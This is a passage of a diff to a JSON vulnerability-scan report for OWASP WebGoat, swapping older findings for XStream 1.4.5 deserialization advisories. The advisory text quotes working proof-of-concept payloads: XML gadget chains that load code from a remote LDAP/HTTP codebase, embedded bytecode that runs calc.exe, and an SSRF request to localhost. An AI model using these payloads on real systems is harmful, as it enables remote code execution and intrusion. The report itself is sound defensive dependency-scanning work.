vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `io.undertow:undertow-core` to version 2.2.33.Final, 2.3.14.Final or higher.\n## References\n- [GitHub Commit](https://github.com/undertow-io/undertow/commit/90f202ada89b6d9883beed0f1fe10c99d470d9a8)\n- [Red Hat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=2293069)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n      \u003ctype\u003e12345\u003c/type\u003e\r\n      \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n        \u003cm__obj class='string'\u003ecom.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: \u0026#x3C;none\u0026#x3E;\u003c/m__obj\u003e\r\n      \u003c/value\u003e\r\n    \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n      \u003ctype\u003e12345\u003c/type\u003e\r\n      \u003cvalue class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'\u003e\r\n        \u003cmessage class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'\u003e\r\n          \u003cparsedMessage\u003etrue\u003c/parsedMessage\u003e\r\n          \u003csoapVersion\u003eSOAP_11\u003c/soapVersion\u003e\r\n          \u003cbodyParts/\u003e\r\n          \u003csm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'\u003e\r\n            \u003cattachmentsInitialized\u003efalse\u003c/attachmentsInitialized\u003e\r\n            \u003cmultiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'\u003e\r\n              \u003csoapPart/\u003e\r\n              \u003cmm\u003e\r\n                \u003cit class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'\u003e\r\n                  \u003caliases class='com.sun.jndi.ldap.LdapBindingEnumeration'\u003e\r\n                    \u003chomeCtx\u003e\r\n                      \u003chostname\u003e233.233.233.233\u003c/hostname\u003e\r\n                      \u003cport__number\u003e2333\u003c/port__number\u003e\r\n                      \u003cclnt class='com.sun.jndi.ldap.LdapClient'/\u003e\r\n                    \u003c/homeCtx\u003e\r\n                    \u003chasMoreCalled\u003etrue\u003c/hasMoreCalled\u003e\r\n                    \u003cmore\u003etrue\u003c/more\u003e\r\n                    \u003cposn\u003e0\u003c/posn\u003e\r\n                    \u003climit\u003e1\u003c/limit\u003e\r\n                    \u003centries\u003e\r\n                      \u003ccom.sun.jndi.ldap.LdapEntry\u003e\r\n                        \u003cDN\u003euid=songtao.xu,ou=oa,dc=example,dc=com\u003c/DN\u003e\r\n                        \u003cattributes class='javax.naming.directory.BasicAttributes' serialization='custom'\u003e\r\n                          \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                            \u003cdefault\u003e\r\n                              \u003cignoreCase\u003efalse\u003c/ignoreCase\u003e\r\n                            \u003c/default\u003e\r\n                            \u003cint\u003e4\u003c/int\u003e\r\n                            \u003cjavax.naming.directory.BasicAttribute serialization='custom'\u003e\r\n                              \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                \u003cdefault\u003e\r\n                                  \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                  \u003cattrID\u003eobjectClass\u003c/attrID\u003e\r\n                                \u003c/default\u003e\r\n                                \u003cint\u003e1\u003c/int\u003e\r\n                                \u003cstring\u003ejavanamingreference\u003c/string\u003e\r\n                              \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003cjavax.naming.directory.BasicAttribute serialization='custom'\u003e\r\n                              \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                \u003cdefault\u003e\r\n                                  \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                  \u003cattrID\u003ejavaCodeBase\u003c/attrID\u003e\r\n                                \u003c/default\u003e\r\n                                \u003cint\u003e1\u003c/int\u003e\r\n                                \u003cstring\u003ehttp://127.0.0.1:2333/\u003c/string\u003e\r\n                              \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003cjavax.naming.directory.BasicAttribute serialization='custom'\u003e\r\n                              \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                \u003cdefault\u003e\r\n                                  \u003cordered\u003efalse\u003c/ordered\u003e\r\n                                  \u003cattrID\u003ejavaClassName\u003c/attrID\u003e\r\n                                \u003c/default\u003e\r\n                                \u003cint\u003e1\u003c/int\u003e\r\n                                \u003cstring\u003erefClassName\u003c/string\u003e\r\n                              \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003c/javax.naming.directory.BasicAttribute\u003e\r\n                            \u003cjavax.naming.directory.BasicAttribute serialization='custom'\u003e\r\n                              \u003cjavax.naming.directory.BasicAttribute\u003e\r\n                                \u003cdefault\u003e\r\n                                  \u003cordered\u003efalse\u003c/ordered\u003e\r\n                       ",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework.boot:spring-boot-starter-undertow",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "io.undertow:undertow-core",
-                  "version": "2.3.10.Final"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000003e-0000-4000-8000-00000000003e",
+          "key": "00000000-0000-0000-0000-000000000015",
           "locations": [
             {
               "package": {
-                "name": "io.undertow:undertow-core",
-                "version": "2.3.10.Final"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 103
+          "problems": [
+            { "id": "CVE-2021-39145", "source": "cve" },
+            { "id": "CWE-434", "source": "cwe" },
+            { "id": "GHSA-8jrj-525p-826v", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:39:25.017804Z",
+              "credits": ["Li4n0"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:58:19.574964Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:51:50.584098Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:48.474589Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.14981Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T08:38:02Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.65041",
+                "probability": "0.00500"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:48.474589Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:23.849157Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39145.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
             }
-          },
-          "title": "Uncontrolled Resource Consumption ('Resource Exhaustion')"
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 274 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "0000003e-0000-4000-8000-00000000003e",
+        "id": "00000000-0000-0000-0000-000000000015",
         "links": {},
         "relationships": {
           "fix": {
@@ -14674,21 +2614,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "io.undertow:undertow-core",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-undertow",
-                          "version": "3.2.10"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "io.undertow:undertow-core",
-                          "version": "2.3.17.Final"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -14697,7 +2633,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000003e-0000-4000-8000-00000000003e",
+              "id": "00000000-0000-0000-0000-000000000015",
               "type": "fixes"
             }
           }
@@ -14707,50 +2643,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-webmvc](https://mvnrepository.com/artifact/org.springframework/spring-webmvc) is a package that provides Model-View-Controller (MVC) architecture and ready components that can be used to develop flexible and loosely coupled web applications.\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity due to `String.toLowerCase()` having some Locale dependent exceptions that could potentially result in fields not protected as expected.\r\n\r\n**Note:**\r\n\r\nThe fix for [CVE-2022-22968](https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) made `disallowedFields` patterns in `DataBinder` case insensitive.\r\n\r\nThis vulnerability was also fixed in commercial versions 5.3.41 and 6.0.25.\n## Remediation\nUpgrade `org.springframework:spring-webmvc` to version 6.1.14 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/23656aebc6c7d0f9faff1080981eb4d55eff296c)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38820)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. A user is only affected if using the version out of the box with JDK 1.7u21 or below.  However, this scenario can be adjusted easily to an external Xalan that works regardless of the version of the Java runtime. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003clinked-hash-set\u003e\r\n  \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization='custom'\u003e\r\n    \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n      \u003cdefault\u003e\r\n        \u003c__name\u003ePwnr\u003c/__name\u003e\r\n        \u003c__bytecodes\u003e\r\n          \u003cbyte-array\u003eyv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVyNDE2NTkyOTE1MTgwNjAwAQAgTHlzb3NlcmlhbC9Qd25lcjQxNjU5MjkxNTE4MDYwMDsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=\u003c/byte-array\u003e\r\n          \u003cbyte-array\u003eyv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ\u003c/byte-array\u003e\r\n        \u003c/__bytecodes\u003e\r\n        \u003c__transletIndex\u003e-1\u003c/__transletIndex\u003e\r\n        \u003c__indentNumber\u003e0\u003c/__indentNumber\u003e\r\n      \u003c/default\u003e\r\n    \u003c/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n  \u003c/com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\u003e\r\n  \u003cdynamic-proxy\u003e\r\n    \u003cinterface\u003ejavax.xml.transform.Templates\u003c/interface\u003e\r\n    \u003chandler class='sun.reflect.annotation.AnnotationInvocationHandler' serialization='custom'\u003e\r\n      \u003csun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n        \u003cdefault\u003e\r\n          \u003cmemberValues\u003e\r\n            \u003centry\u003e\r\n              \u003cstring\u003ef5a5a608\u003c/string\u003e\r\n              \u003ccom.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference='../../../../../../../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'/\u003e\r\n            \u003c/entry\u003e\r\n          \u003c/memberValues\u003e\r\n          \u003ctype\u003ejavax.xml.transform.Templates\u003c/type\u003e\r\n        \u003c/default\u003e\r\n      \u003c/sun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n    \u003c/handler\u003e\r\n  \u003c/dynamic-proxy\u003e\r\n\u003c/linked-hash-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.f",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-web",
-                  "version": "3.1.5"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
-                  "name": "org.springframework:spring-webmvc",
-                  "version": "6.0.13"
+                  "name": "com.thoughtworks.xstream:xstream",
+                  "version": "1.4.5"
                 }
               ],
               "source": "dependency_path"
             }
           ],
           "finding_type": "sca",
-          "key": "0000003f-0000-4000-8000-00000000003f",
+          "key": "00000000-0000-0000-0000-000000000016",
           "locations": [
             {
               "package": {
-                "name": "org.springframework:spring-webmvc",
-                "version": "6.0.13"
+                "name": "com.thoughtworks.xstream:xstream",
+                "version": "1.4.5"
               },
               "type": "package"
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "low"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 31
-            }
-          },
-          "title": "Improper Handling of Case Sensitivity"
+          "problems": [
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T07:51:04.130182Z",
+              "credits": ["Lai Han"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-07-08T16:06:33.130953Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.8,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:12.805793Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:54.921495Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:56.995671Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T07:49:36Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.74008",
+                "probability": "0.00842"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569178",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-07-08T16:06:33.130953Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:25.723467Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39139.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CWE-94", "source": "cwe" },
+            { "id": "CVE-2021-39139", "source": "cve" },
+            { "id": "GHSA-64xx-cq4q-mf44", "source": "ghsa" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 275 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "0000003f-0000-4000-8000-00000000003f",
+        "id": "00000000-0000-0000-0000-000000000016",
         "links": {},
         "relationships": {
           "fix": {
@@ -14758,21 +2782,17 @@
               "attributes": {
                 "action": {
                   "format": "upgrade_package_advice",
-                  "package_name": "org.springframework:spring-webmvc",
+                  "package_name": "com.thoughtworks.xstream:xstream",
                   "upgrade_paths": [
                     {
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.boot:spring-boot-starter-web",
-                          "version": "3.2.11"
-                        },
-                        {
-                          "name": "org.springframework:spring-webmvc",
-                          "version": "6.1.14"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -14781,7 +2801,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "0000003f-0000-4000-8000-00000000003f",
+              "id": "00000000-0000-0000-0000-000000000016",
               "type": "fixes"
             }
           }
@@ -14791,105 +2811,142 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "Dual license: EPL-1.0, LGPL-2.1",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability where the processed stream at unmarshalling time contains type information to recreate the formerly written objects. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'\u003e\r\n        \u003cindexMap class='com.sun.xml.internal.ws.client.ResponseContext'\u003e\r\n          \u003cpacket\u003e\r\n            \u003cmessage class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'\u003e\r\n              \u003cdataSource class='javax.activation.URLDataSource'\u003e\r\n                \u003curl\u003ehttp://localhost:8080/internal/:\u003c/url\u003e\r\n              \u003c/dataSource\u003e\r\n            \u003c/message\u003e\r\n          \u003c/packet\u003e\r\n        \u003c/indexMap\u003e\r\n      \u003c/comparator\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n    \u003cstring\u003ejavax.xml.ws.binding.attachments.inbound\u003c/string\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-21342.html)\n- [XStream Changelog](http://x-stream.github.io/changes.html#1.4.16)\n- [XStream Workaround](https://x-stream.github.io/security.html#workaround)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-validation",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter",
-                  "version": "3.1.5"
-                },
-                {
-                  "name": "org.springframework.boot:spring-boot-starter-logging",
